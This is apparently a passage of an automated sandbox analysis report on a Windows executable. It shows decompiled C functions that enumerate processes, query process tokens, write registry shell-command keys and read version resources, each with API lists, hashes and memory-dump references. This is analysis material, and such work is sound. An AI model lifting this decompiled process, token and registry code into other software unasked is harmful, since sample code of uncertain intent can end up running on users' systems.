                                                                                                                              • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                              • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                            • memset.MSVCRT ref: 004044CF
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                            • memset.MSVCRT ref: 00404539
                                                                                                                            • memset.MSVCRT ref: 0040454E
                                                                                                                            • _snwprintf.MSVCRT ref: 00404571
                                                                                                                            • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                              • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                            • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                            • API String ID: 486436031-734527199
                                                                                                                            • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                            • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                            • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                            • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                            0x00406466
                                                                                                                            0x0040647d
                                                                                                                            0x00406484
                                                                                                                            0x00406499
                                                                                                                            0x004064a0
                                                                                                                            0x004064af
                                                                                                                            0x004064b4
                                                                                                                            0x004064bb
                                                                                                                            0x004064cd
                                                                                                                            0x004064d2
                                                                                                                            0x004064d4
                                                                                                                            0x004064e4
                                                                                                                            0x004064ea
                                                                                                                            0x004064ea
                                                                                                                            0x004064f3
                                                                                                                            0x00406503
                                                                                                                            0x00406514
                                                                                                                            0x00406525
                                                                                                                            0x0040653b
                                                                                                                            0x0040654e
                                                                                                                            0x00406568
                                                                                                                            0x00406572
                                                                                                                            0x0040657a
                                                                                                                            0x00406582
                                                                                                                            0x0040658a
                                                                                                                            0x00406596

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00406484
                                                                                                                            • memset.MSVCRT ref: 004064A0
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                              • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                              • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                              • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                              • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                              • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                              • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                              • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                            • wcscpy.MSVCRT ref: 004064E4
                                                                                                                            • wcscpy.MSVCRT ref: 004064F3
                                                                                                                            • wcscpy.MSVCRT ref: 00406503
                                                                                                                            • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                            • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                            • wcscpy.MSVCRT ref: 0040657A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                            • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                            • API String ID: 3037099051-2314623505
                                                                                                                            • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                            • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                            • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                            • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 44%
                                                                                                                            			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                            0x00409ab0
                                                                                                                            0x00409ab7
                                                                                                                            0x00409ac8
                                                                                                                            0x00409acf
                                                                                                                            0x00409ad4
                                                                                                                            0x00409ae0
                                                                                                                            0x00409ae6
                                                                                                                            0x00409ae8
                                                                                                                            0x00409af0
                                                                                                                            0x00409c3a
                                                                                                                            0x00409c41
                                                                                                                            0x00409c67
                                                                                                                            0x00000000
                                                                                                                            0x00409c67
                                                                                                                            0x00409c49
                                                                                                                            0x00409c50
                                                                                                                            0x00409c51
                                                                                                                            0x00409c56
                                                                                                                            0x00409c57
                                                                                                                            0x00409c5a
                                                                                                                            0x00000000
                                                                                                                            0x00409c64
                                                                                                                            0x00409b00
                                                                                                                            0x00409b03
                                                                                                                            0x00409b06
                                                                                                                            0x00409b0b
                                                                                                                            0x00409b10
                                                                                                                            0x00409ba9
                                                                                                                            0x00409bac
                                                                                                                            0x00409bc1
                                                                                                                            0x00409bc7
                                                                                                                            0x00409bcc
                                                                                                                            0x00409bd8
                                                                                                                            0x00409bf0
                                                                                                                            0x00409bf2
                                                                                                                            0x00409c23
                                                                                                                            0x00409c26
                                                                                                                            0x00409c2f
                                                                                                                            0x00409c34
                                                                                                                            0x00409c34
                                                                                                                            0x00000000
                                                                                                                            0x00409c2f
                                                                                                                            0x00409bf7
                                                                                                                            0x00409bfb
                                                                                                                            0x00409c02
                                                                                                                            0x00409c06
                                                                                                                            0x00409c0d
                                                                                                                            0x00409c14
                                                                                                                            0x00409c17
                                                                                                                            0x00409c18
                                                                                                                            0x00409c1b
                                                                                                                            0x00409c1e
                                                                                                                            0x00000000
                                                                                                                            0x00409c1e
                                                                                                                            0x00409b1f
                                                                                                                            0x00409b25
                                                                                                                            0x00409b2a
                                                                                                                            0x00409b2d
                                                                                                                            0x00409b33
                                                                                                                            0x00409b3d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409b4b
                                                                                                                            0x00409b53
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409b6a
                                                                                                                            0x00409b6c
                                                                                                                            0x00409b6e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409b77
                                                                                                                            0x00409b7b
                                                                                                                            0x00409b82
                                                                                                                            0x00409b86
                                                                                                                            0x00409b8d
                                                                                                                            0x00409b8e
                                                                                                                            0x00409b94
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00409AB7
                                                                                                                            • memset.MSVCRT ref: 00409ACF
                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                            • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                              • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                            • memset.MSVCRT ref: 00409B25
                                                                                                                            • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                            • memset.MSVCRT ref: 00409BC7
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                            • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                            • API String ID: 3504373036-27875219
                                                                                                                            • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                            • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                            • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                            • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                            0x00409179
                                                                                                                            0x00409209
                                                                                                                            0x00409209
                                                                                                                            0x00409185
                                                                                                                            0x0040918a
                                                                                                                            0x0040918f
                                                                                                                            0x00409208
                                                                                                                            0x00000000
                                                                                                                            0x00409191
                                                                                                                            0x0040919e
                                                                                                                            0x004091a2
                                                                                                                            0x004091a7
                                                                                                                            0x004091af
                                                                                                                            0x004091b3
                                                                                                                            0x004091b8
                                                                                                                            0x004091c0
                                                                                                                            0x004091c4
                                                                                                                            0x004091c9
                                                                                                                            0x004091d1
                                                                                                                            0x004091d5
                                                                                                                            0x004091da
                                                                                                                            0x004091e2
                                                                                                                            0x004091e6
                                                                                                                            0x004091eb
                                                                                                                            0x004091ed
                                                                                                                            0x004091ed
                                                                                                                            0x004091eb
                                                                                                                            0x004091da
                                                                                                                            0x004091c9
                                                                                                                            0x004091b8
                                                                                                                            0x004091ff
                                                                                                                            0x00409202
                                                                                                                            0x00409202
                                                                                                                            0x00000000
                                                                                                                            0x004091ff

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                            • API String ID: 1182944575-70141382
                                                                                                                            • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                            • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                            • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                            • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                            0x004090f5
                                                                                                                            0x00409171
                                                                                                                            0x00409171
                                                                                                                            0x004090fd
                                                                                                                            0x00409103
                                                                                                                            0x00409107
                                                                                                                            0x00409170
                                                                                                                            0x00000000
                                                                                                                            0x00409170
                                                                                                                            0x00409116
                                                                                                                            0x0040911a
                                                                                                                            0x0040911f
                                                                                                                            0x00409127
                                                                                                                            0x0040912b
                                                                                                                            0x00409130
                                                                                                                            0x00409138
                                                                                                                            0x0040913c
                                                                                                                            0x00409141
                                                                                                                            0x00409149
                                                                                                                            0x0040914d
                                                                                                                            0x00409152
                                                                                                                            0x0040915a
                                                                                                                            0x0040915e
                                                                                                                            0x00409163
                                                                                                                            0x00409165
                                                                                                                            0x00409165
                                                                                                                            0x00409163
                                                                                                                            0x00409152
                                                                                                                            0x00409141
                                                                                                                            0x00409130
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                            • API String ID: 667068680-3953557276
                                                                                                                            • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                            • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                            • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                            • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 56%
                                                                                                                            			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                            0x00409faf
                                                                                                                            0x00409fb4
                                                                                                                            0x00409fb5
                                                                                                                            0x00409fb6
                                                                                                                            0x0040a043
                                                                                                                            0x0040a04a
                                                                                                                            0x0040a058
                                                                                                                            0x0040a05f
                                                                                                                            0x0040a06d
                                                                                                                            0x0040a074
                                                                                                                            0x0040a08e
                                                                                                                            0x0040a099
                                                                                                                            0x0040a0ab
                                                                                                                            0x0040a0c9
                                                                                                                            0x0040a0ce
                                                                                                                            0x00000000
                                                                                                                            0x0040a0ce
                                                                                                                            0x00409fc3
                                                                                                                            0x00409fca
                                                                                                                            0x00409fd8
                                                                                                                            0x00409fdf
                                                                                                                            0x00409ff9
                                                                                                                            0x0040a006
                                                                                                                            0x0040a018
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_snwprintf
                                                                                                                            • String ID: %%0.%df
                                                                                                                            • API String ID: 3473751417-763548558
                                                                                                                            • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                            • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                            • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                            • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 51%
                                                                                                                            			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                            0x00406216
                                                                                                                            0x0040621b
                                                                                                                            0x00406222
                                                                                                                            0x0040625f
                                                                                                                            0x00406263
                                                                                                                            0x00406269
                                                                                                                            0x00406271
                                                                                                                            0x00406273
                                                                                                                            0x00406289
                                                                                                                            0x00406289
                                                                                                                            0x0040628e
                                                                                                                            0x0040628f
                                                                                                                            0x004062a9
                                                                                                                            0x004062ab
                                                                                                                            0x004062ad
                                                                                                                            0x004062b0
                                                                                                                            0x004062c3
                                                                                                                            0x004062c3
